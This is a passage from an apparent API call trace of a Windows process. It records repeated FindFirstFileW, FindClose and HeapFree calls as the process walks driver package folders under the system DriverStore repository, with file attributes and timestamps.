ftLastWriteTime.dwLowDateTime=0x607a31ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.960] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.960] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hiddigi.inf_amd64_neutral_12aaf5742a9969da\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43372771, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6200939c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6200939c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.960] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.960] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidir.inf_amd64_neutral_5b48c4b1b49ca54a\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d604745, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6077d08f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6077d08f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.961] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.961] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidirkbd.inf_amd64_neutral_2b561a02e977e2e3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d781508, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6077d08f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6077d08f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.961] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.961] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidserv.inf_amd64_neutral_f2223e39f37c69f3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x432da1f0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61fe323c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61fe323c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.962] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.962] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1nd.inf_amd64_neutral_cf39c48277e038de\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b549889, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.962] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.962] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1sd.inf_amd64_neutral_caaa16c52c48f8ac\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b5bbca9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60189984, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60189984, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.965] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.965] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1so.inf_amd64_neutral_4f1a3f1015001339\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b65422a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x601d5c44, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x601d5c44, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.965] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1ss.inf_amd64_neutral_8cae09a2238d64e0\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b6c664b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x601fbda5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x601fbda5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.966] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpsamd.inf_amd64_neutral_84ae149ecc9f8033\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3980691d, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bf011a5, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bf011a5, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.966] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.967] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iastorv.inf_amd64_neutral_668286aa35d55928\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x394e6c37, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3be8ed84, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3be8ed84, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.967] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.967] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\igdlh.inf_amd64_neutral_54a12b57f547d08e\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f35365b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60d4a63a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60d4a63a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.969] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.969] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.970] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iirsp.inf_amd64_neutral_25c14d33af7f54f1\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x425504b7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61dcdef8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61dcdef8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.970] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.973] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iirsp2.inf_amd64_neutral_9ed65fe0bab06b1b\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x425e8a38, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61df4058, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61df4058, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.973] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.973] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.973] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\image.inf_amd64_neutral_4a983035eaabe2f4\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ed860b0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60b5b456, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60b5b456, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.974] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.974] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.974] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\input.inf_amd64_neutral_8693053514b10ee9\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3904a18f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x83f9555a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x3bcc5d01, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.975] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.975] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.975] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ipmidrv.inf_amd64_neutral_1cb648411f252d13\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a45fb54, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c35198d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c35198d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.976] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.976] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.976] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iscsi.inf_amd64_neutral_2ef24e9270d8b2a9\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a37b312, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c32b82d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c32b82d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.976] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.976] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.976] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\keyboard.inf_amd64_neutral_0684fdc43059f486\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38f1968d, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bc538e0, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bc538e0, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.977] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.978] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ks.inf_amd64_neutral_2b583ce4a6a029a1\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d0983c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f745a91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f745a91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.978] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.978] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.979] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\kscaptur.inf_amd64_neutral_6cb3fb6811a3f83d\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e720584, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60a76c14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60a76c14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.979] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.979] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.979] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ksfilter.inf_amd64_neutral_86311fdf78a07678\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e7b8b05, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60a76c14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60a76c14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.979] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.980] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.980] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_fc.inf_amd64_neutral_a7088f3644ca646a\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41838b9f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x617683cc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x617683cc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.980] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.980] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.980] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_sas.inf_amd64_neutral_a4d6780f72cbd5b4\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x418f7280, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61826aae, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61826aae, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.981] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.981] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.981] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_sas2.inf_amd64_neutral_e12a5c4cfbe49204\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4198f801, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6190b2ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6190b2ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.982] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.982] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_scsi.inf_amd64_neutral_cfbbf0b0b66ba280\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41a27d82, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x619efb31, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x619efb31, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.982] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.982] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\machine.inf_amd64_neutral_a2f120466549d68b\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38b87586, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x45ea362b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x45ea362b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.984] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.985] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mchgr.inf_amd64_neutral_407146dba80d1566\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a1d83ef, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c2932ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c2932ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.986] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.987] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mcx2.inf_amd64_neutral_8cf9cade8f7bba56\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e8e9608, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60ac2ed5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60ac2ed5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.987] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.988] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdm3com.inf_amd64_neutral_11abcf129a29fb9f\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x491c4fdf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e96a2d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e96a2d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.988] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.988] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdm5674a.inf_amd64_neutral_46f893a4f998bb46\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x492a9820, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6711e191, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6711e191, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.989] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.989] FindFirstFileW (in: 